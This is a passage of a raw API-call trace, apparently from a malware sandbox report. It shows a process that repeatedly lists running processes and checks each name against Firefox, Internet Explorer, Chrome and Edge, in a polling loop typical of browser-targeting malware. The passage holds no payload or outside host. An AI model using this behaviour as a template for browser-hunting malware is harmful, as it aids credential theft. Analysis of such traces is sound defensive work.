out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.751] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0255.751] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0255.751] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0255.751] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.751] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0255.752] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0255.752] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0255.752] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0255.752] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.752] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0255.752] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0255.752] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0255.752] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0255.752] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.752] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0255.753] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0255.753] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0255.753] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0255.753] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.753] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.753] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0255.753] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0255.753] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0255.753] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.753] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0255.754] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0255.754] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0255.754] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0255.754] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.754] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0255.754] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0255.754] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0255.754] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0255.754] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.754] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0255.755] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0255.755] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0255.755] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0255.755] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.755] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0255.755] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0255.756] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0255.756] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0255.756] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.756] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0255.756] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0255.756] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0255.756] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0255.756] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.756] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0255.757] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0255.757] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0255.757] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0255.757] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.757] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0255.757] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0255.757] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0255.757] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0255.757] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.757] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0255.758] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0255.758] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0255.758] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0255.758] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.758] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0255.758] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0255.758] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0255.758] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0255.758] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.758] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0255.759] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0255.759] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0255.759] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0255.759] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.759] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0255.759] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0255.759] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0255.759] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0255.759] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.760] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0255.760] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0255.760] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0255.760] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0255.760] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.760] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0255.761] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0255.761] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0255.761] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0255.761] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.761] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0255.761] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0255.761] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0255.761] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0255.761] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.761] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0255.762] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0255.762] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0255.762] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0255.762] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.762] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0255.762] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0255.762] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0255.762] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0255.762] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.762] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0255.763] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0255.763] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0255.763] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0255.763] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.763] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0255.763] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0255.763] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0255.763] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0255.763] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.763] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0255.764] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0255.764] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0255.764] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0255.764] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.764] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0255.765] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0255.765] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0255.765] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0255.765] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.765] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0255.765] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0255.765] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0255.765] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0255.765] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.765] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0255.766] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0255.766] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0255.766] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0255.766] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.766] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0255.766] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0255.766] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0255.766] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0255.766] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.766] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.767] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0255.767] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0255.767] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0255.767] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.767] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0255.767] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0255.767] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0255.767] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0255.767] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.767] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.768] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0255.768] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0255.768] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0255.768] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.768] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0255.768] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0255.768] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0255.768] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0255.769] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.769] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.769] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0255.769] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0255.769] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0255.769] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.769] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0255.770] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0255.770] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0255.770] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0255.770] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.770] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.770] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0255.770] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0255.770] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0255.770] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.770] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.771] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0255.771] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0255.771] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0255.771] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.771] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.771] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0255.771] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0255.771] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0255.771] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.771] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.772] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0255.772] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0255.772] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0255.772] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.772] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0255.772] CloseHandle (hObject=0xd4) returned 1 [0255.773] Sleep (dwMilliseconds=0x3e8) [0256.785] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0256.786] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.787] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0256.787] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0256.787] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0256.787] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0256.787] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0256.787] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0256.787] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0256.787] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0256.787] 